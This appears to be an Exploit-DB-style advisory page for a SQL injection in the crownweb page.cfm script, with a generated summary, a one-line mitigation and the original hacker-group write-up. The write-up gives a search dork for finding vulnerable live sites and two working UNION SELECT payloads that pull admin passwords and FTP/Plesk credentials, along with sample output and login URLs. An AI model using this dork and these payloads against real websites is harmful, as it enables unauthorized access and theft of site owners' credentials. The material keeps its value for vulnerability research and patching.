crownweb (page.cfm) Sql Injection Vulnerability

vendor:

crownweb

by:

F.Hack

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: crownweb

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: crownweb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

crownweb (page.cfm) Sql Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in the crownweb page.cfm script to gain access to the webadmin and Plesk control panel credentials. The attacker can use the Dork “Powered By CrownWeb.net!” inurl:”page.cfm” to find vulnerable websites. The attacker can then use the SQL injection payloads www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author and www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata to gain access to the webadmin and Plesk control panel credentials respectively.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious data from being entered into the system.

Source

Exploit-DB raw data:

crownweb (page.cfm) Sql Injection Vulnerability
===================================================================

####################################################################
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : crownweb
.:. Language : Cfm
.:. Script Download: http://www.crownweb.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Powered By CrownWeb.net!" inurl:"page.cfm"
####################################################################

===[ Exploit ]===

www.Localhost.com/page.cfm?id=[Sql Injection]

********************************************************************
T0 Get Username & Password Admin Site

[Sql Injection ; {Name & password Admin}]

www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author

WEBSITE LOGIN: www.localhost.com/siteadmin/

[~] Name : Webadmin
[~] Password : Sec-Attack

********************************************************************
T0 Get Username & Password Plesk Control Panel

[Sql Injection ; {Username & Password Plesk Control Panel}]

www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata

WEBSITE LOGIN: https://IP SRVER:8443/login.php3

[~] ftpserver : 127.0.0.1
[~] domainname : Localhost.com
[~] ftpusername : Root
[~] ftppassword : Sec-Attack

####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack